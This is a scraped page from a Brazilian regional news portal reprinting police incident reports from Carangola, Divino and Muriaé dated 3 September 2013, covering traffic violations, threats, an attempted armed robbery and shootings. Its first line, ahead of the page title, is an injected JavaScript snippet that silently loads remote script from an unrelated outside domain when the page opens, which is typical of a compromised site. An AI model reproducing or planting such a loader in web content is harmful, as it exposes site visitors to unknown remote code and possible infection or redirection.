;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Policia Militar - Ocorrências de destaque - Muriaé, Carangola e região - 03/09/2013. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Policia Militar – Ocorrências de destaque – Muriaé, Carangola e região – 03/09/2013.

pmbn

75ª Cia  Esp PM – CARANGOLA

FALTA DE HABILITACAO OU PERMISSAO PARA DIRIGIR EM CARANGOLA-MG.
Em 03/09/2013 as 16hs:40min policiais compareceram à Avenida Machado de Assis, bairro triangulo, durante realização de operação blitz de trânsito abordaram o condutor do veículo  motocicleta, Yamaha/rd, sendo constatado que o mesmo não possui CNH/PPD, e que o citado veiculo não encontra-se licenciado no exercício de 2013. diante o exposto, foi acionado o guincho credenciado para a remoção do veiculo, o qual foi removido para o patio credenciado, e lavrado os AITs alusivos as infrações narradas.

AMEACA EM CARANGOLA-MG.
Em 03/09/2013, por volta das 18:00h, militares de serviço compareceram à Rua José Ribeiro de Araújo, bairro caixa d’água, onde, segundo a vitima, em data de 02 de setembro de 2013, estava mudando para uma residencia a qual esta em inventario e que teria alugado a casa de uma das herdeiras, contudo a autora apresentou-se como responsável pelo imóvel dizendo que ela estava invadindo o imóvel, tendo então começado os xingamentos, sendo que nesta data a autora passou a chamá-la de “vagabunda,que na casa dela só tem piranha”, fazendo alusão a filha dela de 14 anos, e de posse de um machado batia o mesmo ao solo e dizia: “quero ver ela ficar na casa”. segundo a autora negou os fatos, que não estava de posse de machado e que momento algum dirigiu a palavra a suposta vítima, não sendo localizado o machado.

DISPARO DE ARMA DE FOGO EM EM DIVINO-MG.

Em 03/09/2013 às 21h30minn, militares durante patrulhamento no DISTRITO DE BOM JESUS DE DIVINO, foram procurados por a vítima de 22 anos, que relatou que reside na FAZENDA DA LAJE, localizada no CÓRREGO DOS SALES, e naquela data saiu de casa conduzindo sua motocicleta Honda Twister 250, cor amarela, placa HEV-8878-DIVINO/ MG, e foi até a estrada principal para aguardar a chegada do ônibus escolar que estava trazendo  seu irmão de 13 anos e assim que o adolescente desembarcou do ônibus subiu na motocicleta e ambos foram para casa, mas ao se aproximarem da estrada que liga a referida residência, foram abordados pelo autor de 18 anos, o qual armado com um revólver, bastante nervoso pulou na frente da motocicleta e disse em voz alta que era um assalto e que o veículo fosse entregue a ele, porém, a vítima tirou a chave da ignição e a colocou no bolso e disse ao autor que não entregaria a motocicleta. No mesmo instante, o autor passou a ameaçá-los de morte, inclusive chegando a encostar o cano da arma na cabeça de ambos e dizendo a todo instante que se caso a motocicleta não fosse entregue a ele iria atirar. A vítima declarou que ao perceber que o autor poderia matá-lo, bem como a seu irmão resolveu jogar a motocicleta ao solo e sair correndo do local, com o escopo de evitar qualquer tipo de incidente, no entanto, o autor efetuou um disparo em direção a ambos, contudo, não foram alvejados, em seguida o autor fugiu do local em desabalada carreira tomando rumo incerto, sendo realizado rastreamento  para localizar o autor, mas não obteve êxito.

  76ª CIA PM – MURIAÉ

FURTO TENTADO DE MOTOCICLETA EM MURIAÉ-MG.

Em 03/09/2013 às 23h28min, na AV. CASTELO BRANCO, BAIRRO GÁVEA, MURIAÉ, militares compareceram na Av JK, onde segundo denuncia havia dois menores conduzindo uma moto Yamaha YBR 125 K, de cor preta, placa HFQ-9655/ MURIAÉ, sem capacete, sendo avistado os adolescentes ambos de 16 anos, próximos a referida moto, momento em que os militares interrogaram os mesmos a respeito do veículo que disseram ter furtado a moto próximo ao Parque de Exposições, dando um “tranco” para fazer o veículo pegar, contudo já na Av. JK o veículo sofreu uma pane interrompendo sua fuga. Ambos foram apreendidos em flagrante e encaminhados para a DPJ, sendo que a moto foi recolhida ao pátio credenciado.

 

LESÃO CORPORAL POR DISPARO DE ARMA DE FOGO EM MURIAE-MG.

Em 03/09/2013 às 17h17min, militares compareceram ao HOSPITAL SÃO PAULO, onde deu entrada a vitima de disparo de arma de fogo de 18 anos, que relatou que quando estava acabando de subir o escadão que da acesso à na RUA BICAS, BAIRRO SANTA TEREZINHA, MURIAÉ, foi alvejado por um disparo de arma de fogo em sua panturrilha direita, possivelmente emanada de uma arma longa. Novamente indagado sobre a versão dos fatos, este apresentou outra versão dizendo que quando havia sido vitimado pelo disparo estaria na sua residencia em cima da laje, cabe ressaltar que o individuo demonstrou – se nervoso, e sendo indagado sobre as versões distintas passou a relatar que não queria falar nada sobre assunto. A vitima foi atendida pelo medico plantonista, e foi retirado o projetil que encontrava-se alojado na panturrilha da vitima, de calibre .38.

 ASSESSORIA DE COMUNICAÇÃO DO 47° BPM – MURIAÉ / MG

  RUA JOSÉ DE FREITAS LIMA Nº47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3265.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.